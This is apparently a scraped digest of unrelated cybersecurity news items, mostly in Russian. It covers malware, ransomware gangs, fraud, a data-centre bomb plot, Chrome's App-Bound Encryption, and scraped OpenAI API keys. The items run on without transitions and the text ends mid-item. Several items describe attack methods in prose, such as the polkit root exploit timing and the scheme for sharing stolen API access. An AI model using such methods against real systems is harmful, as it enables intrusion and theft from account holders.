Nim-итерацию BazarBackdoor обнаружили в начале текущего месяца эксперты ИБ-компании Intezer. На тот момент вредоносный характер exe-файла распознали лишь четыре антивируса из коллекции Virus Total. В настоящее время его детектирует больше половины списка.
Судя по комментам на Virus Total, новый семпл BazarBackdoor подписан сертификатом, выданным на имя британской компании Network Design International Holdings Limited.
«Криминальная группа, вероятно, разработала облегченный вариант вредоноса на Nim, чтобы ввести в заблуждение антивирусы и другие средства детектирования, которые традиционно нацелены на бинарники, скомпилированные на C/C++», — пояснил гендиректор Advanced Intel Виталий Кремез (Vitali Kremez), комментируя находку для bleepingcomputer[.]
Бинарные коды Nim могут с равным успехом выполняться на Windows, macOS и Linux. Вирусописатели редко используют такую экзотику в качестве средства обхода антивирусов. Новейшие результаты подобных экспериментов — вымогательские программы DeroHE и Vovalex; первая написана на Nim, вторая — на D.
__https://twitter.com/x/status/1818346978281222400
Cybercriminals using cookie theft [infostealer](https://cloud.google.com/blog/products/identity-security/a-year- in-the-cybersecurity-trenches-with-mandiant-managed-defense) malware continue to pose a risk to the safety and security of our users. We already have a number of initiatives in this area including [Chrome’s download protection](https://security.googleblog.com/2024/07/building-security-into- redesigned.html) using Safe Browsing, [Device Bound Session Credentials](https://blog.chromium.org/2024/04/fighting-cookie-theft-using- device.html), and Google’s account-based threat detection to flag the use of stolen cookies. Today, we’re announcing another layer of protection to make Windows users safer from this type of malware.
Like other software that needs to store secrets, Chrome currently secures sensitive data like cookies and passwords using the strongest techniques the OS makes available to us - on macOS this is the Keychain services, and on Linux we use a system provided wallet such as kwallet or gnome- libsecret. On Windows, Chrome uses the Data Protection API (DPAPI) which protects the data at rest from other users on the system or cold boot attacks. However, the DPAPI does not protect against malicious applications able to execute code as the logged in user - which infostealers take advantage of.
In Chrome 127 we are introducing a new protection on Windows that improves on the DPAPI by providing Application-Bound (App-Bound) Encryption primitives. Rather than allowing any app running as the logged in user to access this data, Chrome can now encrypt data tied to app identity, similar to how the Keychain operates on macOS.
We will be migrating each type of secret to this new system starting with cookies in Chrome 127. In future releases we intend to expand this protection to passwords, payment data, and other persistent authentication tokens, further protecting users from infostealer malware.
How it works
[](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjkAClX2VvgsIhLi2zAmvRwVMPEeJqUhqisKHIKxbfGAwh8p8-V7Ixct5azzn_jYfJYo2izWnGcbkVh3cabbCLVQQQsJAJagvFPCFJsx4MibauJqnLVymQYdhdGGc53q3wSJSeTPQ6vyxXosJ-
tJRKuaaoV7_J_E2KB9glSZ1m3NSEwEBj-
duevgROHlM/s1416/Screenshot%202024-07-26%202.15.06%20PM.png)
App-Bound Encryption relies on a privileged service to verify the identity of
the requesting application. During encryption, the App-Bound Encryption
service encodes the app's identity into the encrypted data, and then verifies
this is valid when decryption is attempted. If another app on the system tries
to decrypt the same data, it will fail.
Because the App-Bound service is running with system privileges, attackers need to do more than just coax a user into running a malicious app. Now, the malware has to gain system privileges, or inject code into Chrome, something that legitimate software shouldn't be doing. This makes their actions more suspicious to antivirus software – and more likely to be detected. Our other recent initiatives such as providing [event logs](https://security.googleblog.com/2024/04/detecting-browser-data-theft- using.html) for cookie decryption work in tandem with this protection, with the goal of further increasing the cost and risk of detection to attackers attempting to steal user data.
Enterprise Considerations
Since malware can bypass this protection by running elevated, enterprise environments that do not grant their users the ability to run downloaded files as Administrator are particularly helped by this protection - malware cannot simply request elevation privilege in these environments and is forced to use techniques such as injection that can be more easily detected by endpoint agents.
App-Bound Encryption strongly binds the encryption key to the machine, so will not function correctly in environments where Chrome profiles roam between multiple machines. We encourage enterprises who wish to support roaming profiles to follow current best practices. If it becomes necessary, App-Bound encryption can be configured using the new ApplicationBoundEncryptionEnabled policy.
To further help detect any incompatibilities, Chrome emits an event when a failed verification occurs. The Event is ID 257 from 'Chrome' source in the Application log.
Conclusion
App-Bound Encryption increases the cost of data theft to attackers and also makes their actions far noisier on the system. It helps defenders draw a clear line in the sand for what is acceptable behavior for other apps on the system. As the malware landscape continually evolves we are keen to continue engaging with others in the security community on improving detections and strengthening operating system protections, such as stronger app isolation primitives, for any bypasses.
Телефонный мошенник преставился сотрудником банка и похитил у 67-летнего пенсионера 16 миллионов рублей. При этом около 500 тысяч пострадавший взял в кредит, сообщил начальник отдела следственного управления УМВД России по городскому округу Подольск, подполковник юстиции Владимир Булычев.
«Сотрудники правоохранительных органов возбудили уголовное дело. Ведется расследование. Личность одного из телефонных мошенников установили», — рассказал он.
По данным следствия, мужчине позвонили лжесотрудники банка и сказали, что пенсионеру необходимо спасти деньги на своих счетах. По их указаниям он сделал около 90 банковских переводов. После того, как злоумышленники выудили у мужчины все деньги, в том числе кредитные, они перестали выходить на связь.
Булычев отметил, что сотрудники банка никогда не будут общаться через мессенджеры и социальные сети. Если кто-то звонит и представляется ими, всегда нужно сначала повесить трубку, а затем перезвонить на горячую линию банка, чтобы убедиться в том, что информация поступила от официальных представителей.
В случае обнаружения мошенничества, нужно незамедлительно обратиться в полицию. Чем больше времени прошло с момента кражи, тем сложнее отследить движение средств и найти преступников.
У следственного управления УМВД России по Подольску налажен электронный документооборот с самыми крупными банками страны, что позволяет вовремя выявлять случаи мошенничества.
Тбилисский городской суд признал троих обвиняемых в кардерстве виновными и приговорил к шести годам тюрьмы каждого, сообщили в пресс-службе прокуратуры Грузии.
В ходе судебного заседания подтвердилось, что 8 мая 2021 года кардеры незаконно получили доступ к интернет-банку потерпевшего и перевели 97 808 лари (около 40 тыс. долларов) на счет одного из подсудимых в "Банке Грузии". Затем деньги были сняты со счета и незаконно присвоены, отметили в прокуратуре.
Кардеры были задержаны 25 октября 2022 года. Им предъявили обвинения по статьям УК Грузии "Кража, совершенная группой лиц по предварительному сговору в крупном размере", а также "Самовольное проникновение в компьютерную систему группой лиц по предварительному сговору, повлекшее значительный материальный ущерб".
source: pog.gov.ge/news/prokuraturis-mier-wardgenili-mtkicebulebebis- safuZvelze-kiber-danashaulis-chadenisTvis-sam-braldebu
Представители децентрализованной биржи KyberSwap сообщили о взломе пула ликвидности Elastic Pools, в результате которого хакеры вывели из протокола около $47 млн.
__https://twitter.com/x/status/1727475235342217682
«В качестве меры предосторожности мы настоятельно рекомендуем всем пользователям незамедлительно вывести свои средства», — предупредила команда проекта.
Первым взлом обнаружил пользователь X под псевдонимом Spreek, указав на подозрительный вывод средств.
__https://twitter.com/x/status/1727462694138024249
По его подсчетам, украденные активы включают $7,5 млн в сети Ethereum, $15 млн в Optimism, $16 млн в Arbitrum, $2,8 млн в Polygon и $870 000 — в Base.
Хакер также оставил сообщение к транзакции:
«Уважаемые разработчики KyberSwap, сотрудники, члены ДАО и партнеры, переговоры начнутся через несколько часов, когда я полностью отдохну. Спасибо».
Генеральный партнер Cinneamhain Ventures Адама Кокран считает, что эксплойт стал возможен благодаря использованию флэш-кредитов и «каких-то математических вычислений». Он пришел к такому выводу, поскольку каждая транзакция злоумышленника начиналась с поступления ETH для оплаты свопа.
Правоохранительные органы США арестовали 28-летнего жителя Техаса Сифа Аарона Пендли (Seth Aaron Pendley) за стремление «уничтожить 70% интернета». По информации Министерства юстиции США, он подозревается в попытке взорвать гигантский дата-центр компании Amazon, который действительно является важной составляющей Всемирной паутины.
ЦОД Amazon расположен в городе Эшберн (Вирджиния, США) и носит «народное» название The Cloud . Как пишет CBS со ссылкой на властей города, этот центр каждый день пропускает через себя до 70% мирового интернет-трафика. В начале 2015 г. он пережил сильный пожар из-за несоблюдения техники безопасности во время сварочных работ.
CBS сообщает, что Amazon не раскрывает списки клиентов, базирующихся в этом дата-центре, но известно, что подобные крупномасштабные ЦОД не обходят стороной многие интернет-гиганты, включая Twitter и Facebook. Онлайн- кинотеатры, например, Netflix, тоже нередко предпочитают базироваться именно в крупных дата-центрах.
Кроме того, даже если не учитывать масштабы конкретного ЦОД в Эшберне, от стабильности работы облака Amazon Web Services (AWS) действительно зависят многие сервисы. AWS – это мировой «облачный» лидер, в IV квартале 2020 г. он занял 32% мирового рынка (по данным Statista), оставив далеко позади Microsoft с ее Azure (20%) и еще сильнее оторвавшись от облака Google (9%). Другие конкуренты получили еще меньшую долю – 6% у Alibaba Cloud, 5% у IBM Cloud, 3% у Salesforce и т. д.
Болтун – находка для ФБР
Сиф Аарон Пендли был арестован 8 апреля 2021 г. при покупке взрывчатки С-4 – продавцом в этой сделке выступил агент ФБР, который продал Пендли муляж взрывчатки. Расследование против него велось с января 2021 г. – он сам привлек к себе внимание ФБР, опубликовав ряд постов на форуме MyMilitia.com, авторы которого называют его «патриотической социальной сетью США» (An American patriot network).
Участники MyMilitia выступают за возможность хранения и ношения огнестрельного оружия обычными гражданами США. Один из пользователей форума под псевдонимом Dionysus в начале 2021 г. писал, что планирует провести некий «небольшой эксперимент» (conduct a little experiment), потенциально «опасный» (dangerous) и способный «наделать много шума» (draw a lot of heat).
Другие участники форума обратились к нему за разъяснениями, в том числе спросили, какого результата он хочет добиться. На это Dionysus ответил одним лишь словом – «смерть» (death). Это сообщение вынудило одного из пользователей MyMilitia обратиться в ФБР – он анонимно передал в Бюро адрес электронной почты, к которому был привязан профиль Dionysus на форуме, и его сотрудники выяснили, что он был зарегистрирован на Пендли.
Следователи нашли страницу «экспериментатора» в Facebook и обнаружили, что он был среди участников штурма Капитолия 6 января 2021 г. Они получили доступ к его личным сообщениям, в которых он рассказывал, что контактировал с полицией и даже привез из дома винтовку, хотя все же решил оставить ее в машине, а в само здание Капитолия не проникал.
Подготовка к аресту
В последних числах января 2021 г., сказано в сообщении Министерства юстиции, Пендли начал использовать защищенный мессенджер Signal для связи с «другим анонимным источником» ФБР. Этот источник поведал следователям, что Пендли рассказывал ему о своих планах по подрыву ЦОД при помощи бомбы С-4 – он якобы хотел «уничтожить около 70% Глобальной сети».
На основе этой информации ФБР разработало план по захвату потенциального террориста, согласно которому «анонимный источник» должен был свести его с «поставщиком взрывчатки» - его роль примерил на себя агент Бюро. Встреча Пендли и «продавца С-4» состоялась 31 марта 2021 г.
По данным ФБР, весь разговор Пендли и агента был записан. В Бюро утверждают, что в ходе этой беседы Пендли рассказывал о том, что услугами ЦОД Amazon в Эшберне пользуются различные федеральные ведомства, включая ЦРУ и ФБР. В публикации Министерства юстиции говорится, что Пендли, по его собственным словам, «надеется свергнуть “олигархию”, в настоящее время удерживающую власть в США».
Задержание и возможное наказание
«Продавец взрывчатки» согласился продать Пендли С-4. Встреча состоялась 8 апреля 2021 г. – агент ФБР под прикрытием передал Пендли муляж бомбы и даже объяснил, как пользоваться ею. После того, как потенциальный террорист положил покупку в свою машину, другие сотрудники ФБР произвели его арест.
Теперь Пендли обвиняется в попытке подорвать дата-центр Amazon, однако его вина на момент публикации материала доказана не была. Другими словами, согласно законам США, пока еще он считается невиновным, но если суд вынесет вердикт не в его пользу, то Пендли может получить до 20 лет лишения свободы с отбытием наказания в федеральной тюрьме. На день ареста ему было 28 лет, то есть он рискует провести в тюрьме почти столько же лет, сколько он прожил на свободе.
Расследование вели сотрудники отделения ФБР в Далласе и объединенная контр- террористической группы ФБР по Северному Техасу. Судебное преследование против Пендли ведет помощник прокурора США Роберт Будро (Robert Boudreau) из Северного округа Техаса при содействии судебного прокурора Александры Хьюз (Alexandra Hughes) из Управления национальной безопасности.
• Source: justice[.]gov/usao-ndtx/pr/texas-man-charged-intent-attack-data- centers
Опасная уязвимость семилетней давности, выявленная в сервисе polkit, позволяет локальному пользователю с минимальным набором прав с легкостью повысить их до уровня root. Проблема актуальна для некоторых дистрибутивов Linux; кураторы проекта Polkit (ранее PolicyKit) выпустили патч 3 июня.
Названная системная служба, ассоциированная с демоном systemd, контролирует взаимодействие программ с разным уровнем привилегий в системе, разрешая или запрещая доступ в соответствии с заложенными политиками авторизации. Уязвимость CVE-2021-3560 позволяет обмануть этого арбитра и добраться до информации, недоступной рядовому пользователю.
По словам автора находки Кевина Бэкхауса (Kevin Backhouse), эксплойт в данном случае тривиален и проводится с помощью обычных инструментов Linux — таких как bash, kill, dbus-send. Как оказалось, подача команды dbus-send (например, для создания нового пользователя в системе) с быстрым откатом позволяет добиться искомого результата, не имея на то прав.
Главное — грамотно рассчитать момент принудительного завершения процесса: polkit в это время должен быть занят обработкой запроса. Помеху он воспримет как вмешательство root-уровня и немедленно выдаст разрешение.
Поскольку PoC-атака задействует множество процессов, правильный момент для отката dbus-send выбрать трудно. Бэкхаусу пришлось написать bash-скрипт и несколько раз повторить эксплойт, прежде чем он добился успеха.
Исследователь полагает, что данную уязвимость потому и не замечали годами — ее трудно воспроизвести. Разбор коммитов в репозитории Polkit показал, что опасная ошибка была привнесена в код 9 ноября 2013 года и благополучно перекочевала во все сборки тулкита, вышедшие после этой даты (с 0.113 по 0.118). Благодаря бдительности Бэкхауса ее, наконец, устранили с выпуском polkit-0.119.
Наличие CVE-2021-3560 подтверждено для RHEL 8, Fedora 21 и выше, Debian 11 (Bullseye), а также Ubuntu 20.04 LTS, 20.10 и 21.04. Производители уже выпустили соответствующие обновления.
• Exploit: <https://github.blog/2021-06-10-privilege-escalation-polkit-root- on-linux-with-bug/#about>
Узнав, что жертвой стала правительственная организация, вымогатели AvosLocker предоставили им ключ для дешифровки бесплатно.
Кибервымогательская группировка AvosLocker бесплатно предоставила жертве ключ для восстановления зашифрованных файлов после того, как узнала, что ею является правительственное учреждение США.
Речь идет об американском полицейском управлении, атакованном AvosLocker в прошлом месяце. Вымогатели зашифровали его файлы и похитили данные. Судя по скриншотам, представленным исследователем безопасности pancak3, поняв, что жертвой стала правительственная организация, операторы вымогательского ПО предоставили ей декриптор бесплатно. Тем не менее, список похищенных файлов они не раскрыли и не рассказали, как им удалось проникнуть в компьютерную сеть полицейского управления.
Как сообщил порталу BleepingComputer участник AvosLocker, у группировки нет четкой политики по поводу того, кого можно атаковать, а кого нет, но обычно партнеры стараются не атаковать правительственные организации и больницы.
«Однако стоит отметить, что иногда партнеры блокируют сеть без нашего предварительного одобрения», - сообщил участник группировки.
На вопрос, избегает ли AvosLocker атаковать правительственные организации из- за страха перед правоохранительными органами, собеседник BleepingComputer ответил, что «деньги налогоплательщиков, как правило, трудно получить».
За последний год в результате целого ряда международных правоохранительных операций были предъявлены обвинения и произведены аресты участников кибервымогательских группировок, в том числе REvil, Egregor, Netwalker и Clop. Усилившееся давление со стороны властей вынудило такие группировки, как DarkSide, BlackMatter, Avaddon и REvil свернуть свои операции. К сожалению, многие из них просто переименовались, в надежде, что это поможет им выйти из поля зрения правоохранительных органов.
Однако, несмотря на аресты и усилившееся давление, участники AvosLocker заявили, что не боятся полиции, поскольку у нее «нет юрисдикции» на их «родине».
Source: twitter.com/pancak3lullz/status/1476217440442925057
На форумах обсуждается ([link](https://breached.vc/Thread-Yet-another- ransomware-leak-URSNIF?pid=962987#pid962987)) инцидент, связанный с раскрытием участников банды-вымогателей URSNIF, и это уже четвертое крупное разоблачение киберпреступных операции в этом году. Аналогичным образом утекли конфиденциальные сведения связанные с операциями ransomware Conti, Yanluowang и трояна TrickBot.
На прошлой неделе, некто под учетной записью URSNIFleak, утверждающий, что он бывший участник операции по созданию вредоносного ПО URSNIF, раскрыл реальные личности трех членов банды в серии твитов.
Также были опубликованы фрагменты чатов переписки банды и скриншоты исходного кода некоторых вредоносных программ URSNIF. Причем личные сообщения содержали обсуждения щепетильных тем, связанных с отмыванием денег и ситуация на Украине.
Если в случае с Conti мотив слива был вызван как раз таки антироссийскими настроениями, то в случае с URSNIF все гораздо эпичнее и приземленнее — банальная месть и попытка шантажа самих представителей банды-вымогателей.
И шантаж сработал, после того как слили информацию о членах низшего звена, стало понятно, что настрой серьезный. Аккаунт URSNIFleak перестал публиковать новый контент только тогда, когда лидер банды (псевдоним CAP) заплатил им за молчание.
Свой последний твит перед удалением аккаунта недовольный хакер закончил репликой: «Я только что заработал больше денег за одну неделю, чем за годы. Платите работникам правильно и у них не будет причин сливать дерьмо».
Вероятно, раздор произошел на почве не самых успешных операций по вымогательству, как надеялась на то банда.
Федеральное жюри США предъявило обвинение инженеру Google, Линвею Дину (также известному как Леон Дин), в краже коммерческих секретов, связанных с программным и аппаратным обеспечением для ИИ-чипов компании. Обвинение было выдвинуто 5 марта, а уже в среду утром Дин был арестован в городе Ньюарк, Калифорния.
Заместитель генерального прокурора Лиза Монако заявила, что Дин украл «более 500 конфиденциальных файлов с коммерческими секретами ИИ, работая тайно на китайские компании, стремящиеся получить преимущество в гонке технологий ИИ».
Среди якобы украденных данных – информация о тензорных процессорах (TPU) Google, которые используются во многих ИИ-задачах Google и, в сочетании с GPU от NVIDIA, позволяют обучать и запускать ИИ-модели, например, Gemini. Компания также предоставляла доступ к TPU-чипам через партнерскую платформу Hugging Face.
В числе предположительно украденных файлов были проекты ПО для TPU-чипов v4 и v5, технические спецификации аппаратного и программного обеспечения для графических процессоров, используемых в дата-центрах Google, а также проекты рабочих нагрузок машинного обучения в ЦОДах компании.
На фоне нарастающей гонки в области технологий ИИ и попыток США ограничить доступ Китая к чипам для ИИ, некоторые китайские компании стали обращаться к местным производителям чипов для работы их ИИ-платформ. В конце 2023 года разведывательные службы стран альянса Пять глаз (США, Великобритания, Канада, Австралия и Новая Зеландия) предупредили американские технологические компании о потенциальной угрозе кражи интеллектуальной собственности китайскими компаниями в областях ИИ, квантовых вычислений и робототехники.
Власти США обвиняют Дина в передаче конфиденциальных файлов в свой личный аккаунт Google Cloud в период с мая 2022 по май 2023 года. По словам Минюста, Дин копировал данные из исходных файлов Google в приложение Apple Notes на своем рабочем MacBook, а затем преобразовывал их из Apple Notes в PDF, чтобы избежать обнаружения системами предотвращения утечки данных Google.
Менее чем через месяц после начала кражи файлов, китайская компания Rongshu, занимающаяся машинным обучением, предложила Дину стать техническим директором. Он отправился в Китай на 5 месяцев для сбора средств для компании, а затем основал и возглавил стартап в области машинного обучения Zhisuan, продолжая при этом работать в Google.
В декабре 2023 года Дин уволился из Google и, по сообщениям, забронировал билет в один конец в Пекин, вылет которого был запланирован через 2 дня после окончания его работы в компании. Минюст также утверждает, что в декабре 2023 года Дин сфальсифицировал свое присутствие в офисе Google в США, попросив другого сотрудника просканировать его бейдж у двери, в то время как сам он находился в Китае.
4 случая кражи конфиденциальных данных Google
Дину предъявлено обвинение в 4-ёх случаях кражи коммерческих секретов, и ему грозит до 10 лет тюремного заключения и штраф в размере до $250 000 за каждый пункт обвинения в случае осуждения.
Специалисты израильской компании Adversa AI, занимающейся разработкой технологий искусственного интеллекта (ИИ), представили новый метод обмана систем распознавания лиц путем добавления на фотографии так называемого шума. Этот шум представляет собой крошечные частички данных, которые невозможно увидеть невооруженным глазом, но которых вполне достаточно для того, чтобы заставить систему распознавания лиц поверить, будто на фото изображен другой человек. В частности, исследователи продемонстрировали, как им удалось заставить систему распознавания лиц PimEyes принять руководителя Adversa AI Алекса Полякова за Илона Маска.
Состязательные атаки (adversarial attacks) совершенствуются с каждым годом, равно как и способы защиты от них. Однако представленная Adversa AI атака под названием «Состязательный осьминог» (Adversarial Octopus) отличается от них по ряду причин.
Во-первых, Adversarial Octopus только маскирует изображенного на фото человека, а не превращает его в кого-то другого. Во-вторых, вместо добавления шума к данным изображения, на котором обучаются модели ИИ (так называемая атака отравления), новый метод предполагает внесение изменений в изображение, которое будет вводиться в систему распознавания лиц, и не требует внутренних знаний о том, как обучалась эта система.
Авторы Adversarial Octopus пока еще не опубликовала научную статью с полным объяснением атаки. Исследователи представят подробности о ней только по завершении процесса ответственного раскрытия уязвимости разработчикам систем распознавания лиц.
• Source: https://adversa.ai/face-recognition-attack-adversarial-octopus/
Группировка Prometheus выставила на продажу данные 27 жертв, в том числе сведения правительственных агентств Мексики.
Исследователи в области кибербезопасности из ИБ-компании Resecurity обнаружили две новые вымогательские группировки — Prometheus и Grief. Участники Prometheus атакуют предприятия из различных сфер по всему миру. Группировка выставила на продажу украденные данные, предположительно принадлежащие правительству Мексики. Данные предположительно были украдены в результате BEC- атак (business email compromise – компрометация деловой почты) и компрометации сетевых ресурсов, принадлежащих нескольким правительственным агентствам Мексики.
Как сообщил портал Security Affairs, на сегодняшний день Prometheus опубликовала данные 27 жертв, и это, похоже, только начало их «карьеры». Список жертв вымогателей включает газовую компанию Ghana National Gas, Центр передового опыта в области сердечно-сосудистой системы Талсы (Оклахома, США), отель Nyack (Нью-Йорк, США), а также предприятия во Франции, Норвегии, Швейцарии, Нидерландах, Бразилии, Малайзии и ОАЭ.
Примечательно, что на своем логотипе группировка упоминает REvil, указывая на связь с данными вымогателями. Представители группировки REvil не подтвердили наличие прямых отношений с новой киберпреступной угрозой. Вероятно, Prometheus является независимым партнером REvil.
Как отметили специалисты, некоторые из образцов вредоносного ПО, связанного с деятельностью Prometheus, обнаруживаются популярными антивирусными движками как программа-вымогатель Thanos (также известная как Hakbit). Thanos была разработана группировкой Nosophoros, выставившей вредонос на продажу в подпольных сообществах.
Grief - менее известная вымогательская группировка. Как утверждают преступники, они похитили данные 5 организаций, в том числе одной в Мексике. Web-сайт Grief в сети Tor имеет защиту от «сканирования», не позволяющую исследователям в области кибербезопасности автоматически индексировать контент. На странице также есть ссылка на правила Общего регламента по защите данных (General Data Protection Regulation, GDPR): «GDPR в Разделе 33 требует, что в случае утечки личных данных контролеры данных должны уведомить соответствующий надзорный орган без неоправданной задержки и, если это возможно, не позднее, чем через 72 часа после обнаружения утечки».
Предположительно, хакеры пытаются мотивировать жертв платить им раньше и таким образом предотвратить возможные проблемы с европейскими регуляторами, что является одной из тактик вымогательства. GDPR позволяет органам ЕС по защите данных налагать штрафы в размере до $24,1 млн или 4% от годового глобального оборота, что пределенно будет более высокой ценой по сравнению с возможной выплатой выкупа.
Журналисты обратили внимание, что на Discord-сервере сабреддита r/ChatGPT все чаще рекламируются украденные токены API OpenAI, которые извлечены из чуждого кода. Люди, использующие ворованные ключи API, могут использовать GPT-4, но плата в итоге будет взиматься с чужой учетной записи.
Издание [Vice Motherboard](https://www.vice.com/en/article/93kkky/people- pirating-gpt4-scraping-openai-api-keys) рассказывает, что в одном из случаев был похищен доступ к аккаунту OpenAI с лимитом использования на 150 000 долларов, а теперь доступ к нему раздают бесплатно через сайт и выделенный сервер Discord, который насчитывает более 500 участников.
[](https://xakep.ru/wp- content/uploads/2023/06/426474/1686153933183-freeaccess.jpg)
Дело в том, что люди и компании, которые хотят использовать языковые модели OpenAI (включая GPT-4) в своих разработках, должны завести аккаунт и привязать к нему банковскую карту. Затем OpenAI выдаст им уникальный ключ API, который позволит получить доступ ко всем нужным инструментам. К примеру, разработчик приложений может использовать имплементацию ChatGPT или других языковых моделей в своем приложении. Ключ API даст ему доступ к этим инструментам, а OpenAI будет взимать плату за их использование. Если же ключ будет украден или случайно раскрыт, любой желающий сможет списывать деньги со счета этого человека.
Чаще всего ключи API удается обнаружить при помощи банального скраппинга. К примеру, журналисты рассказывают о пользователе Discodtehe, который соскраппил сайт Replit (repl.it), позволяющий кодерам совместно работать над различными проектами. Во многих случаях авторы кода, размещенного на сайте, даже не осознавали, что их ключи API OpenAI попали в открытый доступ и теперь доступны третьим лицам.
«Мой акк до сих пор не забанен даже после того, как я совершил это безумное дерьмо, — пишет Discodtehe на Discord-сервере r/ChatGPT. — Если мы наберем достаточно людей, они, скорее всего, не смогут забанить нас всех».
Click to expand...
По данным издания, в последние несколько дней заметно усилилось использование как минимум одного украденного Discodtehe API-ключа. Например, на некоторых скриншотах видно, что в этом месяце было израсходовано 1039,37 долларов из лимита в 150 000.
При этом, похоже, что Discodtehe занимается скраппингом ключей уже довольно давно, считая кражи ключей «просто заимствованием». Так, еще в марте 2023 года он писал в Discord, что нашел на repl.it более 1000 рабочих API-ключей, просмотрев лишь половину полученных результатов. «В конце концов, счета, скорее всего, оплатит OpenAI», — писал он.
Когда журналисты связались с представителями Replit, чтобы сообщить о проблеме, главный юрист и руководитель отдела по развитию бизнеса, Сесилия Зинити (Secrets, Ziniti) сообщила, что «пользователи сами отвечают за сохранность своих токенов и не должны хранить их в публичном коде».
По ее словам, Replit и так сканирует проекты на наличие популярных типов API- ключей (например, GitHub), но в дальнейшем компания «будет пересматривать систему сканирования токенов, чтобы гарантировать, что пользователи предупреждены о возможности случайного раскрытия токенов ChatGPT».
Но Discodtehe пошел дальше простого парсинга токенов для себя и друзей. Так, на другом сервере Discord, под названием ChimeraGPT, он предлагает всем «бесплатный доступ к GPT-4 и GPT-3.5-turbo». В одном из сообщений он рассказывает, что ChimeraGPT злоупотребляет аккаунтом той же организации, у которой был украден ключ API, обсуждавшийся на r/ChatGPT. При этом журналисты обнаружили репозиторий на GitHub, который рекомендует использовать в ChimeraGPT для получения бесплатных API-ключей.
Кроме того, Discodtehe создал сайт, на котором желающие могут запросить бесплатный доступ к API OpenAI (иронично, но сайт тоже был размещен на Replit, и стал недоступен совсем недавно). На сайте пользователям предлагали ввести адрес электронной почты, кликнуть по ссылке, которая придет от OpenAI, принять приглашение и установить в поле платежного адреса организации по умолчанию «weeeee», которую, по-видимому, использует сам Discodtehe.
Согласно скриншотам, которые изучили журналисты, этим способом получения доступа к GPT-4 злоупотребляли как минимум 40 человек.
Хотя сам Discodtehe не ответил на запросы издания, модератор Discord-сервера r/ChatGPT под ником Dawn сообщил Motherboard, что волонтеры просто не успевают проверять все проекты, и теперь Discodtehe забанен.

](https://xakep.ru/2023/06/08/stolen-openai-tokens/)
Журналисты обратили внимание, что на Discord-сервере сабреддита r/ChatGPT все чаще рекламируются украденные токены API OpenAI, которые извлечены из чуждого кода. Люди, использующие ворованные ключи API, могут использовать GPT-4, но плата в итоге будет взиматься с чужой учетной записи.
 xakep.ru
Deepfake-мошенничество в Китае вызывает все большие опасений относительно возможности хакеров легко получать финансовую информацию с использованием искусственного интеллекта. При помощи продвинутых программ, хакеры убедили мужчину из северного Китая перевести деньги своему другу, но направили их на фальшивый счет.
Потерпевший находился в регионе Баотоу, внутренней Монголии, и местная полиция сообщила, что хакер использовал искусственный интеллект для воссоздания визуального и голосового подобия друга. Deepfake-мошенничество заставило потерпевшего поверить, что он переводит 4,3 миллиона юаней (622 000 долларов) своему другу в качестве залога для участия в торгах. Когда друг сказал потерпевшему, что он не знает ни о каком инциденте, мужчина сообщил о мошенничестве в правоохранительные органы, которые, по информации Reuters, заявляют, что им удалось вернуть большую часть украденных средств, но они продолжают работать над возвратом оставшейся суммы.
Социальная сеть Weibo, используется в качестве форума для обсуждения продолжающейся угрозы deepfake-мошенничества. Хэштег "Атаки с использованием искусственного интеллекта по всей стране" стал вирусным и получил более 120 миллионов просмотров в понедельник.
Этот инцидент произошел в условиях роста числа deepfake-мошенничества по всему миру, с сообщениями о том, что мошенники используют технологию искусственного интеллекта для воспроизведения голосов и получения денег по телефону.
Министерство внутренней безопасности США опубликовало доклад, предупреждающий о deepfake-мошенничестве: "Очевидно, что степень и срочность текущей угрозы от искусственных медиа зависит от осведомленности, перспективы и позиции тех, кого вы спрашиваете. Спектр обеспокоенности варьируется от "острой угрозы" до "не паникуйте, просто будьте готовы".
В Великобритании генеральный директор местной энергетической компании перевел 220 тысяч евро (примерно 243 000 долларов) на банковский счет венгерского поставщика после того, как получил звонок от своего предполагаемого начальника. Голос на самом деле принадлежал мошеннику, который использовал технологию искусственного интеллекта для воссоздания голоса начальника, и генеральный директор сказал The Wall Street Journal, что он узнал тонкий немецкий акцент и сказал, что голос "имел мелодику" его собственного голоса.
Тем временем, в США полицейский участок в южном Висконсине предупредил жителей в начале этого месяца о похожих мошеннических схемах после того, как кто-то сообщил, что получил звонок от человека, "похожего на их родственника", сообщает NBC Chicago. Хотя полиция сказала, что они не могут официально подтвердить, что это голос сгенерирован ИИ, они написали в сообщении на Facebook: "Мы хотим, чтобы наше сообщество знало, что такая технология существует".
Министерство внутренней безопасности заявило, что подобные ситуации "неизбежно будут происходить чаще, поскольку стоимость и другие ресурсы, необходимые для создания пригодных для использования дипфейков постоянно снижаются". Чтобы избежать проблем, Министерство внутренней безопасности рекомендует позвонить тому, кто якобы просит деньги, чтобы подтвердить достоверность. Также стоит внимательно относится к распространенным запросам мошенников, включающим просьбу "перевести деньги, отправить криптовалюту или купить подарочные карты и сообщить номера карт и PIN-коды".
source: reuters.com/technology/deepfake-scam-china-fans-worries-over-ai- driven-fraud-2023-05-22
Украинские правоохранительные органы объявили об аресте подозреваемого по обвинению в управлении гигантской бот-сетью вредоносных программ, насчитывающей более 100 000 зараженных систем.
По словам властей, подозреваемый использовал свою бот-сеть для проведения DDoS-атак, рассылки спама, перебора паролей учетных записей пользователей, сканирования сетей на предмет уязвимостей и их эксплуатации.
Об аресте объявила сегодня Служба безопасности Украины (СБУ):
Имя подозреваемого не разглашается.
Арест произошел в Ивано-Франковской области, в Коломыйском районе.
Сотрудники СБУ провели обыск в доме подозреваемого и изъяли его компьютерное
оборудование.
По словам сотрудников СБУ, подозреваемый рекламировал свои услуги через
Telegram и форумы с закрытым доступом.
Подозреваемый принимал оплату через WebMoney, российскую платформу денежных
переводов, запрещенную в Украине.
Новости об аресте появились после того, как российская охранная фирма "Ростелеком-Solar" помогла уничтожить DDoS-ботнет Meris, а власти США предъявили обвинения гражданину Турции в связи с ботнетом WireX.
Пока неясно, с каким ботнетом связан подозреваемый, арестованный в Украине. Представитель СБУ не ответил на запрос о комментарии.
Источник: <https://therecord.media/ukraine-arrests-operator-of-ddos-botnet- with-100000-bots/>
Крупнейшая площадка по продаже профессиональных инструментов для фишинга прекратила своё существование.
Международная полицейская организация Интерпол недавно провела глобальную операцию по ликвидации популярной среди киберзлоумышленников PhaaS-платформы под названием 16shop функционирующей в даркнете уже около шести лет.
